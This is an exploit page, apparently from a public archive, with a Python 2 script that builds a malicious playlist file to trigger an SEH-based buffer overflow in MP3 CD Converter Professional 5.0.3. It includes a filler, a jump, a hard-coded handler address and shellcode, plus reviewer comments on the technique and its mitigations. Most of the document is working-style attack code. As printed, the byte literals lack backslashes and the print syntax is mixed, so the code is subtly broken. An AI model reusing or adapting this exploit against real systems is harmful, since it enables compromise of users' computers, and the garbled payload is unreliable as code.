MP3 CD Converter Professional Buffer Overflow
Posted on 20 December 2010
#!/usr/bin/python
#
# Python file created by C4SS!0 G0MES
# http://www.invasao.com.br
# Louredo_@hotmail.com
#
# [+]Exploit Title: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
# [+]Date: 12/20/2010
# [+]Author: C4SS!0 G0M3S
# [+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
# [+]Version: 5.0.3
# [+]Tested On: WIN-XP SP3 Virtual Box
# [+]CVE: N/A
#
# Reviewer notes:
#   * Python 2 script (it uses print statements). It writes one file whose
#     content is: filler, a 4-byte "next SEH" field, a 4-byte handler
#     pointer, a short pad, and a payload -- the usual layout of a
#     structured-exception-handler (SEH) overwrite proof of concept.
#   * The handler pointer and the addresses embedded in the payload are
#     hard-coded absolute values, so the file is tied to the build named in
#     "Tested On" above. SafeSEH/SEHOP, DEP and ASLR are the platform
#     mitigations aimed at this class of overwrite.
#   * As the listing appears on this page, the byte-escape literals have
#     lost their backslashes ("x41" rather than an escape sequence), so they
#     are plain ASCII text. They are reproduced here unchanged.

import os
import sys
import struct
import time


def usage():
    """Clear the console, set its colour and print the author's banner."""
    # Windows-only console commands, as in the original.
    for console_cmd in ("cls", "color 4f"):
        os.system(console_cmd)

    banner = "".join((
        " ",
        "===================================================================== ",
        "|| || ",
        "|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) || ",
        "|| Author C4SS!0 G0M3S || ||",
        " || ",
        "===================================================================== ",
    ))
    print(banner)

    info_lines = (
        "[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)",
        "[+]Date: 12/20/2010",
        "[+]Author: C4SS!0 G0M3S",
        "[+]E-mail: Louredo_@hotmail.com",
        "[+]Home: http://www.invasao.com.br",
        "[+]Impact: Hich",
        "[+]Version: 5.0.3",
        "[+]Country: Brazil ",
    )
    for info in info_lines:
        print(info)


# Exactly one argument is expected: the name of the file to create.
if len(sys.argv) != 2:
    usage()
    script_name = sys.argv[0]
    print "[-]Usage: " + script_name + " <File Name>"
    print "[-]Exemple: " + script_name + " Exploit.pls"
    sys.exit(0)

# Pieces of the file content, in the order they are written.
filler = "x41" * 780
next_seh = "xebx0dx90x90"  # JMP SHORT 14
handler_ptr = struct.pack('<L', 0x0077cebf)  # little-endian 32-bit value
pad = "x90" * 10

usage()
print "[*]Identifying the length Shellcode"
time.sleep(1)

# Payload literal exactly as shown on the page. The push-immediate constants
# spell ASCII fragments that look like a message-box demonstration payload;
# that reading is inferred from the bytes, not confirmed by running it.
shellcode = (
    "x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50"
    "xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50"
    "xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43"
    "x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B"
    "x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6"
)
print "[*]The length is Shellcode:" + str(len(shellcode))
time.sleep(1)

payload = "".join([filler, next_seh, handler_ptr, pad, shellcode])
print "[*]Creating the Archive " + sys.argv[1]
time.sleep(1)

out_path = sys.argv[1]
try:
    handle = open(out_path, "w")
    handle.write(payload)
    handle.close()
    print "[*]The Archive was created " + str(out_path) + " Success"
    time.sleep(1)
except:
    # Bare except kept from the original: every failure, whatever its cause,
    # is reported as a file-creation error.
    print "[-]Error Creating File " + out_path